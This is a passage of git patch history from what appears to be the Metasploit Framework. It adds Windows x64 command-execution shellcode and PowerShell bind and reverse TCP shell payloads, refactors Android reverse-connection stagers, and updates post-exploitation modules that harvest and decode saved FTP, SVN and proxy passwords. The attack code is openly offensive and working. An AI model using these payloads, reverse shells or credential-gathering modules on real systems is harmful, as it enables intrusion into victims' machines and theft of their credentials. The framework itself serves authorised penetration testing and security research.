z@$CsecU~xTrR$=lC+_dKDnKPMDl1(c7yn6w$rMfsDPFDw?T$ypB4|oM6^Xc)szpSG
zvz*_XPn+MSzXA{C5l{_Tp~cs(9}12|!z_y)?8rIZ8;wselI}ix$!N4WLr3O;K^A5}
zM@gj8xYx8{o~g6nX?&sGVwMU$7mLD<@AlK6>+0M`lkd7@25>L~2S|<VKI<9D@@z{>
z3(Ieg8`KYTPNG@&U(Ojh7o3;lVSsLh)x`q4y;9DPHNyIz$={o-k!QMql#{QEZ2FwS
z3b@0g^(7<f;{D|#2yw&1Va?eUV)A~WF6w$Pn;$61%{`)roOiNtLL%QS&@`&vt^jJ8
zsq^D2lq1O1SXx%E_{T)5$70|M@6xq5t5#c!KaBjPz6k^X=xy$H3Q204BH$kkeGi2#
n4E?YE4NCw2%J&Xi0QpDpo8@;np^!i_Tf=Re5xIHZ{ZIEdVw^M~

diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb
index e416884adc..3c08b708fc 100644
--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -87,8 +87,7 @@ module Exploit::Android
 
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)
-    path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
-    data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
+    data = MetasploitPayloads.read('android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
     data.gsub!('PLOAD', stagename)
   end
 
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index ba444f688a..1ad0f6eaaf 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.1'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.2'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index 99c5359be8..532675a1a6 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -41,7 +41,7 @@ module Metasploit3
     lurl << "/"
     lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
     apply_options(classes)
 
@@ -51,7 +51,7 @@ module Metasploit3
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index 9aa3b13bc8..2d010578e0 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -41,7 +41,7 @@ module Metasploit3
     lurl << "/"
     lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
@@ -59,7 +59,7 @@ module Metasploit3
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index 3985848e58..603d1acf42 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -31,7 +31,7 @@ module Metasploit3
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
     string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
@@ -44,7 +44,7 @@ module Metasploit3
       [ "resources.arsc" ]
     ]
 
-    jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 065435cd37..fe2e95a156 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -39,11 +39,8 @@ module Metasploit3
   def generate_stage(opts={})
     # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
-    file = File.join(Msf::Config.data_directory, "android", "metstage.jar")
-    metstage = File.open(file, "rb") {|f| f.read(f.stat.size) }
-
-    file = File.join(Msf::Config.data_directory, "android", "meterpreter.jar")
-    met = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    metstage = MetasploitPayloads.read("android", "metstage.jar")
+    met = MetasploitPayloads.read("android", "meterpreter.jar")
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage
diff --git a/modules/payloads/stages/android/shell.rb b/modules/payloads/stages/android/shell.rb
index 60eaf61f11..5b68d4b419 100644
--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@@ -36,8 +36,7 @@ module Metasploit3
   #
   def generate_stage(opts={})
     clazz = 'androidpayload.stage.Shell'
-    file = File.join(Msf::Config.data_directory, "android", "shell.jar")
-    shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    shell_jar = MetasploitPayloads.read("android", "shell.jar")
 
     # Name of the class to load from the stage, and then the actual jar
     # to load it from

From 9d1a7cead42f6c6ecf5000821cbd0dbcd965aba7 Mon Sep 17 00:00:00 2001
From: benpturner <benpturner@yahoo.com>
Date: Mon, 1 Jun 2015 16:11:23 +0100
Subject: [PATCH 0266/1013] New modules to support 64bit process powershell.

---
 lib/msf/core/payload/windows/exec_x64.rb      | 67 +++++++++++++++++++
 lib/msf/core/payload/windows/x64/exec.rb      | 65 ++++++++++++++++++
 .../windows/x64/powershell_bind_tcp.rb        | 60 +++++++++++++++++
 .../windows/x64/powershell_reverse_tcp.rb     | 60 +++++++++++++++++
 4 files changed, 252 insertions(+)
 create mode 100644 lib/msf/core/payload/windows/exec_x64.rb
 create mode 100644 lib/msf/core/payload/windows/x64/exec.rb
 create mode 100644 modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb

diff --git a/lib/msf/core/payload/windows/exec_x64.rb b/lib/msf/core/payload/windows/exec_x64.rb
new file mode 100644
index 0000000000..eb5249abc1
--- /dev/null
+++ b/lib/msf/core/payload/windows/exec_x64.rb
@@ -0,0 +1,67 @@
+# -*- coding: binary -*-
+
+module Msf
+
+###
+#
+# Common command execution implementation for Windows.
+#
+###
+
+module Payload::Windows::Exec_x64
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows x64 Execute Command',
+      'Description'   => 'Execute an arbitrary command (Windows x64)',
+      'Author'        => [ 'sf' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'EXITFUNC' => [ 229, 'V' ]
+            },
+          'Payload' =>
+            "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+            "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+            "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+            "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+            "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
+            "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
+            "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
+            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
+            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
+            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
+            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
+            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
+            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
+            "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
+            "\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
+            "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
+            "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
+        }
+      ))
+    register_options(
+      [
+        OptString.new('CMD', [ true, "The command string to execute" ]),
+      ], self.class )
+  end
+
+  def generate
+    return super + command_string + "\x00"
+  end
+
+  def command_string
+    return datastore['CMD'] || ''
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/x64/exec.rb b/lib/msf/core/payload/windows/x64/exec.rb
new file mode 100644
index 0000000000..547ca5cfe4
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/exec.rb
@@ -0,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+module Metasploit3
+
+  CachedSize = 268
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows x64 Execute Command',
+      'Description'   => 'Execute an arbitrary command (Windows x64)',
+      'Author'        => [ 'sf' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'EXITFUNC' => [ 229, 'V' ]
+            },
+          'Payload' =>
+            "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+            "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+            "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+            "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+            "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
+            "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
+            "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
+            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
+            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
+            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
+            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
+            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
+            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
+            "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
+            "\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
+            "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
+            "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
+        }
+      ))
+    register_options(
+      [
+        OptString.new('CMD', [ true, "The command string to execute" ]),
+      ], self.class )
+  end
+
+  def generate
+    return super + command_string + "\x00"
+  end
+
+  def command_string
+    return datastore['CMD'] || ''
+  end
+
+end
diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
new file mode 100644
index 0000000000..7e17623a7a
--- /dev/null
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec_x64'
+require 'msf/core/payload/windows/powershell'
+require 'msf/base/sessions/powershell'
+require 'msf/core/handler/bind_tcp'
+
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+  CachedSize = 1695
+
+  include Msf::Payload::Windows::Exec_x64
+  include Rex::Powershell::Command
+  include Msf::Payload::Windows::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::PowerShell,
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def command_string
+    generate_powershell_code("Bind")
+  end
+end
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
new file mode 100644
index 0000000000..f06cc8f038
--- /dev/null
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec_x64'
+require 'msf/core/payload/windows/powershell'
+require 'msf/base/sessions/powershell'
+require 'msf/core/handler/reverse_tcp_ssl'
+
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+  CachedSize = 1703
+
+  include Msf::Payload::Windows::Exec_x64
+  include Msf::Payload::Windows::Powershell
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Session'       => Msf::Sessions::PowerShell,
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def command_string
+    generate_powershell_code("Reverse")
+  end
+end

From d22dda2babc38e53bc151c9191393cb849357e3d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 1 Jun 2015 10:33:40 -0500
Subject: [PATCH 0267/1013] Provide more context and references

---
 lib/msf/core/auxiliary/report.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index a12487f593..3ab5efe66a 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -179,7 +179,13 @@ module Auxiliary::Report
   # @option opts [String] :pass The private part of the credential (e.g. password)
   def report_auth_info(opts={})
     print_warning("*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!")
-    return if not db
+    print_warning('*** For detailed information about LoginScanners and the Credentials objects see:')
+    print_warning('     https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners')
+    print_warning('     https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module')
+    print_warning('*** For examples of modules converted to just report credentials without report_auth_info, see:')
+    print_warning('     https://github.com/rapid7/metasploit-framework/pull/5376')
+    print_warning('     https://github.com/rapid7/metasploit-framework/pull/5377')
+    return unless db
     raise ArgumentError.new("Missing required option :host") if opts[:host].nil?
     raise ArgumentError.new("Missing required option :port") if (opts[:port].nil? and opts[:service].nil?)
 

From 449ce32f0770650d52fc63be44f61084d0dc7cb4 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 1 Jun 2015 15:16:04 -0500
Subject: [PATCH 0268/1013] update for new UUID namespace

---
 modules/payloads/stagers/android/reverse_http.rb  | 4 ++--
 modules/payloads/stagers/android/reverse_https.rb | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index 532675a1a6..bc84647149 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -13,7 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index 2d010578e0..b26e75de92 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -13,7 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,

From 7133f0a68e701a9c717ffdc8276f84229fc1b983 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 1 Jun 2015 16:45:09 -0500
Subject: [PATCH 0269/1013] Fix typo in author's name

---
 modules/exploits/windows/local/lenovo_systemupdate.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb
index 732c7deb5e..09dc63b395 100644
--- a/modules/exploits/windows/local/lenovo_systemupdate.rb
+++ b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Local
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'Micahel Milvich', # vulnerability discovery, advisory
+          'Michael Milvich', # vulnerability discovery, advisory
           'Sofiane Talmat',  # vulnerability discovery, advisory
           'h0ng10'           # Metasploit module
         ],

From d03ee5667bc3b2a8978eec1a49ab3551a123e8c1 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 1 Jun 2015 16:45:36 -0500
Subject: [PATCH 0270/1013] Remove assigned but unused local vars

---
 modules/exploits/windows/local/lenovo_systemupdate.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb
index 09dc63b395..ff4a2a4cf5 100644
--- a/modules/exploits/windows/local/lenovo_systemupdate.rb
+++ b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Local
   def get_security_token(lenovo_directory)
     unless client.railgun.get_dll('tvsutil')
       client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
-      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
+      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
     end
 
     dll_response = client.railgun.tvsutil.GetSystemInfoData(256)

From c3e15059a7af16bedaf700ebf8c689cd9919d148 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 1 Jun 2015 21:17:58 -0500
Subject: [PATCH 0271/1013] Update total_commander to use the new cred API

---
 .../gather/credentials/total_commander.rb     | 41 +++++++++++++++----
 1 file changed, 33 insertions(+), 8 deletions(-)

diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb
index dbf7607210..410c8efc28 100644
--- a/modules/post/windows/gather/credentials/total_commander.rb
+++ b/modules/post/windows/gather/credentials/total_commander.rb
@@ -120,6 +120,32 @@ class Metasploit3 < Msf::Post
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def get_ini(filename)
     config = client.fs.file.new(filename,'r')
     parse = config.read
@@ -142,14 +168,13 @@ class Metasploit3 < Msf::Post
       else
         source_id = nil
       end
-      report_auth_info(
-        :host  => host,
-        :port => port,
-        :sname => 'ftp',
-        :source_id => source_id,
-        :source_type => "exploit",
-        :user => username,
-        :pass => passwd
+
+      report_cred(
+        ip: host,
+        port: port,
+        service_name: 'ftp',
+        user: username,
+        password: passwd
       )
     end
   end

From b98cc89f0c4d0c1a66280395af81d36808ba04de Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 00:22:17 -0500
Subject: [PATCH 0272/1013] Update filezilla_client_cred to use the new cred
 API

---
 .../multi/gather/filezilla_client_cred.rb     | 55 ++++++++++++++++---
 1 file changed, 46 insertions(+), 9 deletions(-)

diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb
index c49d05748a..60ed1366af 100644
--- a/modules/post/multi/gather/filezilla_client_cred.rb
+++ b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -103,6 +103,43 @@ class Metasploit3 < Msf::Post
     return nil
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def is_base64?(str)
+    str.match(/^([A-Za-z0-9+\/]{4})*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)$/) ? true : false
+  end
+
+
+  def try_decode_password(str)
+    is_base64?(str) ? Rex::Text.decode_base64(str) : str
+  end
+
+
   def get_filezilla_creds(paths)
 
     sitedata = ""
@@ -155,14 +192,14 @@ class Metasploit3 < Msf::Post
           else
             source_id = nil
           end
-          report_auth_info(
-            :host  => loot['host'],
-            :port => loot['port'],
-            :sname => 'ftp',
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => loot['user'],
-            :pass => loot['password'])
+
+          report_cred(
+            ip: loot['host'],
+            port: loot['port'],
+            service_name: 'ftp',
+            username: loot['user'],
+            password: try_decode_password(loot['password'])
+          )
         end
       end
     end
@@ -214,7 +251,7 @@ class Metasploit3 < Msf::Post
       print_status("    Server: %s:%s" % [account['host'], account['port']])
       print_status("    Protocol: %s" % account['protocol'])
       print_status("    Username: %s" % account['user'])
-      print_status("    Password: %s" % account['password'])
+      print_status("    Password: %s" % try_decode_password(account['password']))
       print_line("")
     end
     return creds

From 1ae9265fb9ecdb2df6ba646a7951f09b1ea5c9b6 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 00:52:43 -0500
Subject: [PATCH 0273/1013] Update tortoisesvn to use the new cred API

---
 .../windows/gather/credentials/tortoisesvn.rb | 61 ++++++++++++++-----
 1 file changed, 45 insertions(+), 16 deletions(-)

diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb
index db627d7332..0a3ac517e7 100644
--- a/modules/post/windows/gather/credentials/tortoisesvn.rb
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -89,14 +89,15 @@ class Metasploit3 < Msf::Post
     else
       source_id = nil
     end
-    report_auth_info(
-    :host  => Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
-    :port => http_proxy_port,
-    :sname => "http",
-    :source_id => source_id,
-    :source_type => "exploit",
-    :user => http_proxy_username,
-    :pass => http_proxy_password)
+
+    report_cred(
+      host: ::Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
+      port: http_proxy_port,
+      service_name: 'http',
+      user: http_proxy_username,
+      password: http_proxy_password
+    )
+
   end
 
   def get_config_files
@@ -122,6 +123,33 @@ class Metasploit3 < Msf::Post
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def analyze_file(filename)
     config = client.fs.file.new(filename, 'r')
     contents = config.read
@@ -177,14 +205,15 @@ class Metasploit3 < Msf::Post
     else
       source_id = nil
     end
-    report_auth_info(
-    :host  => ::Rex::Socket.resolv_to_dotted(host), # XXX: Workaround for unresolved hostnames
-    :port => portnum,
-    :sname => sname,
-    :source_id => source_id,
-    :source_type => "exploit",
-    :user => user_name,
-    :pass => password)
+
+    report_cred(
+      ip: ::Rex::Socket.resolv_to_dotted(host), # XXX: Workaround for unresolved hostnames
+      port: portnum,
+      service_name: sname,
+      user: user_name,
+      password: password
+    )
+
     vprint_status("Should have reported...")
 
     # Set savedpwds to 1 on return

From b4cfe93977e07e072e4d69218fb60c99d4ab95b2 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 2 Jun 2015 14:16:16 +0500
Subject: [PATCH 0274/1013] Add creds API

---
 modules/post/multi/gather/dbvis_enum.rb | 51 ++++++++++++++++++++++---
